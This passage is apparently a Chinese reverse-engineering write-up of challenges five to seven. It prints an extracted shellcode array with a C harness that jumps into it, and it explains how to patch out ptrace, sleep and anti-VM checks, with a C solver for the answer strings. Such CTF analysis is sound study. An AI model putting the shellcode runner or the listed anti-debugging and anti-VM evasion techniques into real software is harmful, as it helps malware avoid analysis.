0x87, 0xC0, 0xD4, 0x0D, 0xB0, 0x4B, 0x2F, 0xB6, 0x81, 0xE3, 0x74, 0x05, 0xB9, 0x3F, 0x67, 0x1B,
0xD5, 0x93, 0x96, 0x83, 0xE0, 0x66, 0xB5, 0x47, 0xB7, 0x98, 0x3C, 0x15, 0x34, 0xA9, 0x48, 0x37,
0x27, 0x3D, 0x75, 0x4F, 0xBF, 0x8C, 0xE2, 0x43, 0x99, 0xB8, 0x73, 0x38, 0xEB, 0x7D, 0x7A, 0x25,
0x85, 0xF9, 0x8D, 0xBB, 0x91, 0x7F, 0x67, 0x96, 0x92, 0xB2, 0x79, 0x48, 0x3C, 0x4A, 0x33, 0xD4,
0xA9, 0x97, 0x7E, 0x37, 0x47, 0xB3, 0x3D, 0x93, 0x24, 0x05, 0x3F, 0x9F, 0x39, 0xE1, 0x71, 0x35,
0xB4, 0x23, 0xD6, 0xA8, 0x14, 0x88, 0xD1, 0xF8, 0x72, 0x42, 0xBA, 0x76, 0x08, 0xFD, 0x41, 0xBE,
0x4B, 0xB5, 0x0D, 0x15, 0x77, 0x43, 0x74, 0x11, 0xE3, 0x78, 0x20, 0xE0, 0x1C, 0x04, 0xBF, 0x40,
0x10, 0xD5, 0x27, 0xB7, 0xB1, 0x70, 0x2B, 0xF5, 0x2F, 0x22, 0xFC, 0x4E, 0x9B, 0x98, 0x1D, 0x90,
0x2C, 0xB6, 0x7C, 0x4F, 0x2D, 0x34, 0x66, 0x0C, 0x99, 0xB0, 0x49, 0x7B, 0x7A, 0x78, 0x7E, 0x7F,
0x73, 0x7D, 0x46, 0xB9, 0x91, 0xB0, 0x8D, 0x92, 0xBF, 0x90, 0xB7, 0x21, 0xF6, 0xE0, 0x4B, 0x13,
0xF5, 0x29, 0xEB, 0x67, 0x77, 0x25, 0x86, 0xE1, 0x05, 0x2A, 0xD6, 0x66, 0xB9, 0xA8, 0x35, 0x15,
0x96, 0x42, 0x98, 0x34, 0x99, 0xB1, 0xBA, 0xB4, 0x2C, 0xB5, 0x12, 0xF8, 0x93, 0x4F, 0x76, 0x7B,
0x79, 0x30, 0xFD, 0xBE, 0x71, 0x3F, 0x40, 0x4E, 0xB3, 0x7C, 0x75, 0x27, 0x09, 0xE2, 0x24, 0x43,
0x70, 0x0C, 0x2D, 0x18, 0xE3, 0x02, 0xF9, 0x4A, 0x47, 0xBB, 0xB6, 0x41, 0x9F, 0x72, 0x48, 0x97,
0x80, 0xD4, 0x28, 0xD5, 0x9B, 0x74, 0x3C, 0x1C, 0x84, 0xFC, 0x7D, 0x49, 0xB8, 0x7E, 0x6B, 0xD2,
0xE0, 0x1D, 0x76, 0x0D, 0x74, 0x31, 0xEB, 0x14, 0x70, 0x37, 0xA9, 0x71, 0x3D, 0x72, 0x46, 0xB2,
0x78, 0x2F, 0x7F, 0x04, 0xA9, 0xB6, 0x7B, 0x1C, 0x73, 0x3A, 0xE1, 0x3C, 0xBE, 0x19, 0xF9, 0x34,
0x00, 0xD5, 0x7A, 0x03, 0xF8, 0xE2, 0x24, 0xB0, 0x4E, 0xFD, 0x79, 0x3D, 0x96, 0x75, 0x15, 0x9B,
0x49, 0x7C, 0x2F, 0xB4, 0x4F, 0x9F, 0x99, 0x47, 0x3B, 0xC1, 0xD0, 0xE3, 0x14, 0x40, 0x3F, 0x90,
0xBF, 0x41, 0x97, 0x43, 0x8D, 0xB8, 0x48, 0xB5, 0x77, 0x0D, 0xB2, 0x4A, 0x93, 0x2D, 0x67, 0x92,
0x98, 0xB1, 0x1A, 0xFC, 0xB9, 0xD4, 0x2C, 0xB3, 0xF5, 0xBA, 0x0C, 0x69, 0xD6, 0x91, 0xA8, 0x04,
0xBB, 0x1D, 0x66, 0x46, 0x05, 0x25, 0xB7, 0x35, 0x42, 0x37, 0x27, 0x4B, 0x90, 0xFC, 0x33, 0xD2,
0xB2, 0x30, 0x64, 0xFF, 0x32, 0x5A, 0x8B, 0x52, 0x0C, 0x8B, 0x52, 0x14, 0x8B, 0x72, 0x28, 0x33,
0xC9, 0xB1, 0x18, 0x33, 0xFF, 0x33, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0xC1, 0xCF,
0x0D, 0x03, 0xF8, 0xE2, 0xF0, 0x81, 0xFF, 0x5B, 0xBC, 0x4A, 0x6A, 0x8B, 0x5A, 0x10, 0x8B, 0x12,
0x75, 0xDA, 0x8B, 0x53, 0x3C, 0x03, 0xD3, 0xFF, 0x72, 0x34, 0x8B, 0x52, 0x78, 0x03, 0xD3, 0x8B,
0x72, 0x20, 0x03, 0xF3, 0x33, 0xC9, 0x41, 0xAD, 0x03, 0xC3, 0x81, 0x38, 0x47, 0x65, 0x74, 0x50,
0x75, 0xF4, 0x81, 0x78, 0x04, 0x72, 0x6F, 0x63, 0x41, 0x75, 0xEB, 0x81, 0x78, 0x08, 0x64, 0x64,
0x72, 0x65, 0x75, 0xE2, 0x49, 0x8B, 0x72, 0x24, 0x03, 0xF3, 0x66, 0x8B, 0x0C, 0x4E, 0x8B, 0x72,
0x1C, 0x03, 0xF3, 0x8B, 0x14, 0x8E, 0x03, 0xD3, 0x52, 0x33, 0xFF, 0x57, 0x68, 0x61, 0x72, 0x79,
0x41, 0x68, 0x4C, 0x69, 0x62, 0x72, 0x68, 0x4C, 0x6F, 0x61, 0x64, 0x54, 0x53, 0xFF, 0xD2, 0x68,
0x33, 0x32, 0x01, 0x01, 0x66, 0x89, 0x7C, 0x24, 0x02, 0x68, 0x75, 0x73, 0x65, 0x72, 0x54, 0xFF,
0xD0, 0x68, 0x6F, 0x78, 0x41, 0x01, 0x8B, 0xDF, 0x88, 0x5C, 0x24, 0x03, 0x68, 0x61, 0x67, 0x65,
0x42, 0x68, 0x4D, 0x65, 0x73, 0x73, 0x54, 0x50, 0xFF, 0x54, 0x24, 0x2C, 0x57, 0x68, 0x44, 0x21,
0x21, 0x21, 0x68, 0x4F, 0x57, 0x4E, 0x45, 0x8B, 0xDC, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x14,
0x24, 0x81, 0x72, 0x0B, 0x16, 0xA3, 0xFB, 0x32, 0x68, 0x79, 0xCE, 0xBE, 0x32, 0x81, 0x72, 0x17,
0xAE, 0x45, 0xCF, 0x48, 0x68, 0xC1, 0x2B, 0xE1, 0x2B, 0x81, 0x72, 0x23, 0x10, 0x36, 0x9F, 0xD2,
0x68, 0x71, 0x44, 0xFA, 0xFF, 0x81, 0x72, 0x2F, 0xF7, 0xA9, 0xA9, 0x0C, 0x68, 0x84, 0xE9, 0xCF,
0x60, 0x81, 0x72, 0x3B, 0xBE, 0x93, 0xA9, 0x43, 0x68, 0xD2, 0xA3, 0x98, 0x37, 0x81, 0x72, 0x47,
0x82, 0x8A, 0x62, 0x3B, 0x68, 0xEF, 0xA4, 0x11, 0x4B, 0x81, 0x72, 0x53, 0xD6, 0x47, 0xC0, 0xCC,
0x68, 0xBE, 0x69, 0xA4, 0xFF, 0x81, 0x72, 0x5F, 0xA3, 0xCA, 0x54, 0x31, 0x68, 0xD4, 0xAB, 0x65,
0x52, 0x8B, 0xCC, 0x57, 0x53, 0x51, 0x57, 0x8B, 0xF1, 0x89, 0xF7, 0x83, 0xC7, 0x1E, 0x39, 0xFE,
0x7D, 0x0B, 0x81, 0x36, 0x42, 0x45, 0x45, 0x46, 0x83, 0xC6, 0x04, 0xEB, 0xF1, 0xFF, 0xD0, 0x68,
0x65, 0x73, 0x73, 0x01, 0x8B, 0xDF, 0x88, 0x5C, 0x24, 0x03, 0x68, 0x50, 0x72, 0x6F, 0x63, 0x68,
0x45, 0x78, 0x69, 0x74, 0x54, 0xFF, 0x74, 0x24, 0x40, 0xFF, 0x54, 0x24, 0x40, 0x57, 0xFF, 0xD0
};
/*
 * Debug harness from the write-up: transfers control into the global byte
 * array above so the extracted shellcode can be single-stepped in a debugger.
 * argc/argv/envp are unused. The printf has no trailing newline, so its text
 * may still be sitting in the stdio buffer if the code that runs next crashes.
 * The inline asm is MSVC 32-bit syntax (eax). On a build where the data
 * section is non-executable (DEP/NX, the default for modern toolchains) the
 * jmp faults instead of running; that is the mitigation doing its job.
 * Control is not expected to come back, so "return 0" is effectively dead code.
 */
int main(int argc, const char **argv, const char **envp)
{
    printf("11111111111111111111111");
    __asm
    {
        lea eax, shellcode;   /* address of the global buffer */
        jmp eax;              /* execution continues inside the array */
    }
    return 0;
}
第五題
這道題真是白了少年頭啊...
最終是透過flare, com這兩個關鍵片語推理出 _cfltcvt_init
函式內各個變數之間的關係...
實際上稍微注意下函式 _cfltcvt_init
內各個變數的使用情況就可以發現, 除了初始化各個變數時都賦值一次外, 每個變數都有兩次賦值(先賦值為1, 後賦值為0)和一次與0比較. 每當變數值大於0時, 馬上賦值為0, 並且給另外一個變數賦值1, 因此推斷這個變數應該首先賦值1, 然後與0比較, 如果大於0則讓它等於0, 然後讓另外一個變數值為1, 因此可猜測這些變數的賦值操作是有順序的, 每一次賦值都是設定標誌位, 標誌著上一道手續已經完成, 該進行下一道手續了, 而唯一要做的手續就是構造字串. 因此, 只要按照各個變數的賦值順序順藤摸瓜即可.
按照這個理論去推算 flare, com, 發現完全符合, 並且推算出中間的破折號是 dash, on 字母還是 on, 英文句點是 dot, 剩下的就是從 _cfltcvt_init
函式內第一個變數開始推理了, 最終結果:
l0ggingdoturdot5tr0ke5atflaredashondotcom
去掉 dot, at, dash, 得到:
[email protected]
PS: 沒有找到一個簡單的方法讓這個程式自己輸出郵箱地址...
第六題
各種坑, 各種混淆, 還有反除錯, 把我這個菜鳥快坑死了...
剛開始時完全不知道如何入手, 於是自己寫 Hello World 測試, 確定 main
函式位置...
後來得到大牛指導, 根據程式輸出內容確定 printf
函式位置並標記它, 而且這個程式也是與引數有關的.
OK, 得到大牛指點後就標記了 printf
函式, 並且測試了當引數不同時程式的輸出有什麼不同, 測試發現:
- 一個引數: 輸出 no;
- 兩個引數: 輸出 bad;
- 三個或三個以上引數: 輸出 stahp
根據以上資訊可推測程式應該只接受兩個引數, 後面的分析也證明是這樣~
另外, 在使用 strace
命令檢視程式的系統呼叫時也可以發現, 只要引數個數不是兩個的時候, 程式行為與是否被 strace
監控無關, 一旦程式有兩個引數時, 這個程式就有個反除錯判定:
#!bash
[email protected]:~/Desktop/6# strace -i ./e7bc5d2c0cf4480348f5504196561297 1 1
[ 7fc5b45bba87] execve("./e7bc5d2c0cf4480348f5504196561297", ["./e7bc5d2c0cf4480348f55041965612"..., "1", "1"], [/* 30 vars */]) = 0
[ 4a9297] uname({sys="Linux", node="kali", ...}) = 0
[ 4aa78a] brk(0) = 0x1441000
[ 4aa78a] brk(0x14421c0) = 0x14421c0
[ 45e3f5] arch_prctl(ARCH_SET_FS, 0x1441880) = 0
[ 4aa78a] brk(0x14631c0) = 0x14631c0
[ 4aa78a] brk(0x1464000) = 0x1464000
[ 47431b] ptrace(PTRACE_TRACEME, 0, 0x1, 0) = -1 EPERM (Operation not permitted)
[ 473e44] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 6), ...}) = 0
[ 47509a] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f04f4220000
[ 473f50] write(1, "Program received signal SIGSEGV,"..., 52Program received signal SIGSEGV, Segmentation fault
) = 52
[ 473dd8] exit_group(9001) = ?
OK, 根據提示資訊, 找到地址為 47431b 的位置, 發現這是一個值為 65h
的系統呼叫, 檢視 GNU/Linux 系統呼叫列表發現它是 __NR_ioperm (101, 設定埠 I/O 許可權), 不知道為什麼在此處卻變成了 __NR_ptrace (26, 程式跟蹤) 呼叫了, 請求大牛指點~
(補充: 上面查的是 32 位 i386 的系統呼叫表, 其中 26 是 ptrace, 101 是 ioperm; 這個程式是 64 位的, 在 x86-64 的系統呼叫表中 101 正是 __NR_ptrace, 所以 strace 顯示的 ptrace(PTRACE_TRACEME) 就是這個呼叫, 並沒有矛盾.)
上面這個地方就是反除錯的地方了, 直接將呼叫這個函式的地方修改 NOP
, 也就是 42F211 處的 E8 9A 50 05 00
五個位元組全改為 90
即可.
然後就可以用 kali 自帶的 edb 除錯了(相比 gdb, 這貨沒有 backtrace
這樣牛逼的命令啊).
透過 bad 字串可以確定第一個引數長度為 10 個位元組, 而且每個位元組與 56h 異或後等於字串 bngcg`debd, 因此可以反推出第一個引數是 4815162342. 下面這段程式碼是異或第一個引數的:
#!bash
.text:0000000000437149 loc_437149: ; CODE XREF: sub_435E20+139Fj
.text:0000000000437149 mov eax, [rbp+var_C4]
.text:000000000043714F cdqe
.text:0000000000437151 add rax, [rbp+var_230]
.text:0000000000437158 mov edx, [rbp+var_C4]
.text:000000000043715E movsxd rdx, edx
.text:0000000000437161 add rdx, [rbp+var_230]
.text:0000000000437168 movzx edx, byte ptr [rdx]
.text:000000000043716B xor edx, 56h
.text:000000000043716E mov [rax], dl
.text:0000000000437170 add [rbp+var_C4], 1
看看第一個引數檢測透過後程式做了什麼:
#!bash
[email protected]:~/Desktop/6# strace -i ./test 4815162342 a
[ 7ff6ad0f4a87] execve("./test", ["./test", "4815162342", "a"], [/* 31 vars */]) = 0
[ 4a9297] uname({sys="Linux", node="kali", ...}) = 0
[ 4aa78a] brk(0) = 0x10c9000
[ 4aa78a] brk(0x10ca1c0) = 0x10ca1c0
[ 45e3f5] arch_prctl(ARCH_SET_FS, 0x10c9880) = 0
[ 4aa78a] brk(0x10eb1c0) = 0x10eb1c0
[ 4aa78a] brk(0x10ec000) = 0x10ec000
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 473d50] nanosleep({3600, 0},
程式卡住了, sleep
3600秒, 檢視下有兩處呼叫這個函式, 分別設定斷點, 最終確認是 473C67 處呼叫的, 將其設定為空指令~
再使用 strace
跟蹤程式, 什麼都發現不了了...
#!bash
[email protected]:~/Desktop/6# strace ./test 4815162342 a
[ 7fbf6cd9ea87] execve("./test", ["./test", "4815162342", "a"], [/* 30 vars */]) = 0
[ 4a9297] uname({sys="Linux", node="kali", ...}) = 0
[ 4aa78a] brk(0) = 0x103c000
[ 4aa78a] brk(0x103d1c0) = 0x103d1c0
[ 45e3f5] arch_prctl(ARCH_SET_FS, 0x103c880) = 0
[ 4aa78a] brk(0x105e1c0) = 0x105e1c0
[ 4aa78a] brk(0x105f000) = 0x105f000
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[ 47c882] rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
[ 47c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[ 7fffc3975aec] _exit(140736474871580) = ?
此時, 我忘記之前是如何發現處理第二個引數的地方了...仔細想想, 當時應該是花費了大量時間篩選程式結構, 利用類似二分法的方式排除了大量無用函式後才剛好碰到了處理第二個引數的地方了.
現在重新來過肯定不能用這個笨方法了, 之前大牛提到過給引數下訪問斷點的事情, 好吧, 給第二個引數下訪問斷點吧. 此時就不能用 edb 除錯了, 只能祭出神器 gdb 了, 在 main
下斷點, 確定第二個引數的記憶體地址, 然後使用 watch
命令給該地址下訪問斷點, 執行程式, 當程式停下來時檢視函式呼叫桟:
#!bash
(gdb) bt
#0 0x00007fffffffd15f in ?? ()
#1 0x00007fffffffd148 in ?? ()
#2 0x000000000044bb2d in ?? ()
#3 0x000000000044c8f1 in ?? ()
#4 0x000000000044eabc in ?? ()
#5 0x000000000045bf71 in ?? ()
#6 0x000000000045dd01 in ?? ()
#7 0x000000000045dea4 in ?? ()
#8 0x0000000000401081 in ?? ()
#9 0x00007fffffffe438 in ?? ()
#10 0x0000000000000000 in ?? ()
此時執行反彙編命令 disassemble
失敗:
#!bash
(gdb) disassemble
No function contains program counter for selected frame.
那就還是在 edb 中除錯吧~~~
切換到 edb,檢視 0x44bb2d 處彙編程式碼, 在 0x44bb2b 處下斷點, 然後跟進函式呼叫即可看到第二個引數的驗證過程:
#!bash
.text:000000000044BB13 lea rdx, [rbp+var_440]
.text:000000000044BB1A mov rax, [rbp+var_450]
.text:000000000044BB21 add rax, 10h
.text:000000000044BB25 mov rax, [rax]
.text:000000000044BB28 mov rdi, rax
.text:000000000044BB2B call rdx
.text:000000000044BB2D
.text:000000000044BB2D loc_44BB2D: ; CODE XREF: sub_44B942+AEj
.text:000000000044BB2D mov [rbp+var_2B], 44h
.text:000000000044BB31 mov [rbp+var_25], 44h
.text:000000000044BB35 cmp [rbp+var_25], 44h
.text:000000000044BB39 jz short loc_44BB6C
最終得出第二個引數是 [email protected].
因此, 該程式的兩個引數分別是 4815162342 [email protected]
附錄:
gdb中檢視字串:
#!bash
p "%s", *(char*)[email protected]
生成第二個引數的C語言程式碼(程式中驗證過程的逆運算):
注: 每個函式可生成/輸出一個字母, 函式名是測試時各個跳轉的記憶體地址, 僅供參考.
#!c
#include <stdio.h>
/* Rotate the 8-bit value c left by bits positions (counts above 8 are taken
 * modulo 8; 0 and 8 are both identity). Inverse of the binary's right rotate. */
unsigned char CROL(unsigned char c, int bits)
{
    int n = (bits > 8) ? (bits % 8) : bits;
    unsigned int v = c;
    return (unsigned char)((v << n) | (v >> (8 - n)));
}
/* Rotate the 8-bit value c right by bits positions (counts above 8 are taken
 * modulo 8; 0 and 8 are both identity). Inverse of the binary's left rotate. */
unsigned char CROR(unsigned char c, int bits)
{
    int n = (bits > 8) ? (bits % 8) : bits;
    unsigned int v = c;
    return (unsigned char)((v >> n) | (v << (8 - n)));
}
/* Scratch byte shared by the helpers below: each loads a constant, applies the
 * inverse of the binary's check for one position, and prints the result.
 * a76/a90/aa4/ab2 shadow it with a local instead of using this global. */
unsigned char c = 0;
/* Character 1 of the second argument; name is the branch address in the binary. */
void e87c()
{
    c = CROL(27, 0xf2);
    putchar(c);
}
/* Character 2: three XOR layers over a constant. */
void e886()
{
    unsigned char v = 48;
    v ^= 0xb3;
    v ^= 0xf2;
    v ^= 64;
    c = v;
    putchar(c);
}
/* Character 3: single XOR. */
void e89a()
{
    c = 31 ^ 113;
    putchar(c);
}
/* Character 4: rotate then subtract (8-bit wrap). */
void e8a8()
{
    unsigned char v = CROL(0xb0, 0xbc);
    c = (unsigned char)(v - 0xa3);
    putchar(c);
}
/* Character 5: one wrapping addition. */
void e8b9()
{
    c = (unsigned char)(0xe8 + 121);
    printf("%c", c);
}
/* Character 6: add (wrapping) then rotate. */
void e8c7()
{
    unsigned char v = (unsigned char)(0xf6 + 40);
    c = CROL(v, 0x82);
    printf("%c", c);
}
/* Character 7: subtract, rotate, add; every step wraps at 8 bits. */
void e8d8()
{
    unsigned char v = (unsigned char)(31 - 44);
    v = CROL(v, 77);
    c = (unsigned char)(v + 0xb0);
    putchar(c);
}
/* Character 8: subtract, rotate left, XOR, rotate right, subtract. */
void e8ec()
{
    unsigned char v = (unsigned char)(0xaf - 63);
    v = CROL(v, 42);
    v ^= 0xb8;
    v = CROR(v, 0x99);
    c = (unsigned char)(v - 84);
    putchar(c);
}
/* Character 9: single rotate. */
void e906()
{
    c = CROL(93, 0xba);
    putchar(c);
}
/* Character 10: subtract (wraps), rotate, XOR. */
void e914()
{
    unsigned char v = (unsigned char)(41 - 48);
    v = CROL(v, 108);
    c = v ^ 0xed;
    putchar(c);
}
/* Character 11: one wrapping addition. */
void e928()
{
    c = (unsigned char)(0xb5 + 0xbf);
    putchar(c);
}
/* Character 12: add/sub pair, rotate, subtract, rotate. */
void e936()
{
    unsigned char v = 0xa5;
    v -= 99;
    v += 49;
    v = CROR(v, 123);
    v -= 0x8c;
    c = CROR(v, 0xbc);
    putchar(c);
}
/* Character 13: three right rotates around one XOR (rotate by 32 is identity). */
void e950()
{
    unsigned char v = CROR(0xf3, 0x98);
    v ^= 0xae;
    v = CROR(v, 22);
    c = CROR(v, 32);
    putchar(c);
}
/* Character 14: subtract (wraps) then rotate. */
void e967()
{
    unsigned char v = (unsigned char)(0xa6 - 0xd2);
    c = CROL(v, 110);
    putchar(c);
}
/* Character 15: one subtraction. */
void e978()
{
    c = (unsigned char)(98 - 52);
    putchar(c);
}
/* Character 16: XOR followed by three wrapping add/sub steps. */
void e986()
{
    unsigned char v = 50 ^ 0xb2;
    v -= 98;
    v += 16;
    v -= 0xcd;
    c = v;
    putchar(c);
}
/* Character 17: rotate then two XORs. */
void e99d()
{
    unsigned char v = CROL(0xeb, 7);
    v ^= 115;
    c = v ^ 0xb7;
    putchar(c);
}
/* Character 18: add/sub, rotate, add/sub. */
void e9b1()
{
    unsigned char v = 11;
    v += 76;
    v -= 91;
    v = CROL(v, 54);
    v += 97;
    v -= 52;
    c = v;
    putchar(c);
}
/* Character 19: one subtraction. */
void e9cb()
{
    c = (unsigned char)(0x9a - 90);
    putchar(c);
}
/* Character 20: single rotate. */
void e9d9()
{
    c = CROL(0x99, 0xa2);
    putchar(c);
}
/* Character 21: wrapping add then XOR. */
void e9e7()
{
    unsigned char v = (unsigned char)(43 + 0xe7);
    c = v ^ 126;
    putchar(c);
}
/* Character 22: rotate right, rotate left, subtract, XOR, add. */
void e9f8()
{
    unsigned char v = CROR(0xaf, 87);
    v = CROL(v, 74);
    v -= 78;
    v ^= 0x86;
    c = (unsigned char)(v + 0xb8);
    putchar(c);
}
/* Character 23: XOR chain, rotate right, XOR, rotate left. */
void ea12()
{
    unsigned char v = 0xc3 ^ 0xad ^ 74;
    v = CROR(v, 0x95);
    v ^= 0xe8;
    c = CROL(v, 0x86);
    putchar(c);
}
/* Character 24: subtract (wraps), XOR, rotate. */
void ea2c()
{
    unsigned char v = (unsigned char)(3 - 28);
    v ^= 0xcc;
    c = CROL(v, 69);
    putchar(c);
}
/* Character 25: one wrapping addition. */
void a40()
{
    c = (unsigned char)(0xe3 + 74);
    putchar(c);
}
/* Character 26: rotate then XOR. */
void a4e()
{
    unsigned char v = CROL(0xca, 0x90);
    c = v ^ 0xa5;
    putchar(c);
}
// n
/* Character 27 ('n' per the note above): add, XOR, rotate right, rotate left. */
void a5f()
{
    unsigned char v = (unsigned char)(62 + 0xd8);
    v ^= 120;
    v = CROR(v, 54);
    c = CROL(v, 0xde);
    putchar(c);
}
// .
/* Character 28 ('.'): uses a local, so the global scratch byte is left untouched. */
void a76()
{
    unsigned char ch = CROR(0xd8, 17);
    ch = CROR(ch, 0xa2);
    ch = CROL(ch, 0x89);
    ch += 0xad;
    ch -= 0xb5;
    putchar(ch);
}
// c
/* Character 29 ('c'): local scratch byte; global c is not modified. */
void a90()
{
    unsigned char ch = CROL(0x82, 0xc0);
    ch += 33;
    ch -= 64;
    putchar(ch);
}
// o
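/* Character 30 ('o'). Uses unsigned char like the rest of the file: the
 * original declared a plain char, which makes the conversion of values
 * >= 0x80 implementation-defined even though the printed byte is the same. */
void aa4()
{
    unsigned char ch = 123;
    ch = CROR(ch, 0xe3);
    printf("%c", ch);
}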
// m
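/* Character 31 ('m'). Uses unsigned char like the rest of the file: the
 * original declared a plain char, so 0xd7 and the rotate result were stored
 * through an implementation-defined signed conversion; the printed byte is
 * unchanged, the arithmetic is now well-defined 8-bit wraparound. */
void ab2()
{
    unsigned char ch = 0xd7;
    ch = CROL(ch, 0xf6);
    ch += 120;
    printf("%c", ch);
}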
int main()
{
e87c();
e886();
e89a();
e8a8();
e8b9();
e8c7();
e8d8();
e8ec();
e906();
e914();
e928();
e936();
e950();
e967();
e978();
e986();
e99d();
e9b1();
e9cb();
e9d9();
e9e7();
e9f8();
ea12();
ea2c();
a40();
a4e();
a5f();
a76();
a90();
aa4();
ab2();
return 0;
}
第七題
這個程式使用了大量反除錯/反虛擬機器/根據時間定期觸發行為的特性, 並且每透過一個檢測點後就會對程式異或解密一次, 如果所有的檢測點都透過後, 會生成一個 dotNet 程式, 然後再破解這個 dotNet 程式, 找出郵箱地址.
這個程式在第一個函式 call test.00401030
使用 IsDebuggerPresent
函式檢測是否被除錯, 如果程式被除錯這個函式返回非零值, 否則返回值為0.
第二個函式 call test.004010C0
檢查 PEB(Process Environment Block) 的 BeingDebugged 標誌, 如果值為 1 則表示該程式被除錯. 其偏移位置為 FS:[0x32]. (FS:0 指向 TEB(Thread Environment Block), FS:[0x30] 指向 PEB, 而 BeingDebugged 在 PEB 偏移 2h 處).
第三個函式 call test.00401130
透過 sidt
指令獲取中斷描述符表 IDT(Interrupt Descriptor Table) 的地址, 如果 IDT 地址為 0xFFxxxxxx, 則認為程式執行在虛擬機器中, 拒絕解密程式碼. 在 VMware 的虛擬機器上 IDT 位於地址 0xFFxxxxxx, 而真實機地址為 0x80xxxxxx. 不過比較幸運的是由於VMware更新, 這個檢測點已經失效了, 所以此函式不需要修改了.
第四個函式 call test.004011D0
透過執行特權指令 in
來檢測虛擬機器, 此處使用功能號 0A 獲取VMware, 檢測其返回值是否為 VMXH.
第五個函式 call test.004012A0
連續呼叫 SetLastError
, OutputDebugStringW
和 GetLastError
函式, 如果程式被除錯, 則 OutputDebugStringW
呼叫成功, GetLastError
返回值仍舊是剛剛透過 SetLastError
設定的值.
第六個函式 call test.00401350
檢測從地址區間 test.00401030~test.00401780 內指令操作碼 0xCC
數目是否等於 0x55, 如果不等, 則認為程式被除錯.
第七個函式 call test.004013F0
檢測 PEB 偏移 68h 處的 NtGlobalFlag 標誌, 當程式被除錯時, 該值等於 70h.
第八個函式 call test.00401460
檢測當前日期是否為任意一個月的 5 號, 如果是 5 號的話就解密程式...
然後是獲取當前程式檔案的路徑以及引數的起始地址, 存放在 eax 中. 此處要將 eax 指向的字串修改為 backdoge.exe, 後面函式會使用到這個檢測點.
第九個函式 call test.004014F0
檢查 eax 指向的字串是否等於 backdoge.exe, 如果是則解密程式....
第十個函式 call test.00401590
有兩個檢測點, 但是, 如果檢測條件為真的話會 混淆(不是解密哦) 程式碼, 所以一定要確保檢測點為假. 不過一般情況下本函式不需要修改. 因為目前大多還在使用 IPv4, 並且不會將 www.dogecoin.com 重定向到 127.0.0.1(這個檢測點有點怪, 誰會將這個域名重定向到127.0.0.1呢???).
第十一個函式 call test.004016F0
又是檢測時間的. 如果當前時間點為 17點 的話, 則透過檢測, 解密程式碼.
#!bash
00401B13 > \E8 18F5FFFF call test.00401030
00401B18 . E8 A3F5FFFF call test.004010C0
00401B1D . E8 0EF6FFFF call test.00401130
00401B22 . E8 A9F6FFFF call test.004011D0
00401B27 . E8 74F7FFFF call test.004012A0
00401B2C . E8 1FF8FFFF call test.00401350
00401B31 . E8 BAF8FFFF call test.004013F0
00401B36 . E8 25F9FFFF call test.00401460
00401B3B . 8B06 mov eax, dword ptr ds:[esi]
00401B3D . E8 AEF9FFFF call test.004014F0
00401B42 . E8 49FAFFFF call test.00401590
00401B47 . E8 A4FBFFFF call test.004016F0
後面這段程式碼是解密程式碼的, 不用管.
#!bash
00401B4C |. 8B1D 38945100 mov ebx, dword ptr ds:[test.519438]
00401B52 |. 8B3E mov edi, dword ptr ds:[esi]
00401B54 |. 33C9 xor ecx, ecx
00401B56 |. 85DB test ebx, ebx
00401B58 |. 74 29 jz short test.00401B83
00401B5A |. 8D9B 00000000 lea ebx, [ebx]
00401B60 |> B8 ABAAAAAA /mov eax, AAAAAAAB
00401B65 |. F7E1 |mul ecx
00401B67 |. C1EA 03 |shr edx, 3
00401B6A |. 8D0452 |lea eax, [edx*2+edx]
00401B6D |. 03C0 |add eax, eax
00401B6F |. 03C0 |add eax, eax
00401B71 |. 8BD1 |mov edx, ecx
00401B73 |. 2BD0 |sub edx, eax
00401B75 |. 8A043A |mov al, byte ptr ds:[edi+edx]
00401B78 |. 3081 F8314100 |xor byte ptr ds:[ecx+test.4131F8], al
00401B7E |. 41 |inc ecx
00401B7F |. 3BCB |cmp ecx, ebx
00401B81 |.^ 72 DD \jb short test.00401B60
第十二個函式 call test.004017A0. 這個函式與第十個函式的檢測類似, 如果您沒有修改第十個檢測函式, 即您的電腦使用了 IPv4, 則本函式也不需要修改.
第十三個函式 call test.004018A0
需要翻牆訪問 https://twitter.com/FireEye/status/484033515538116608, 讀取頁面內容, 將 Secluded Hi 後面的 7 個位元組(也就是 jackRAT)作為異或解密的金鑰解密程式. 你可以翻牆, 或者本地搭伺服器修改host~
#!bash
00401B83 |> \E8 18FCFFFF call test.004017A0
00401B88 |. E8 13FDFFFF call test.004018A0 ; [test.004018A0
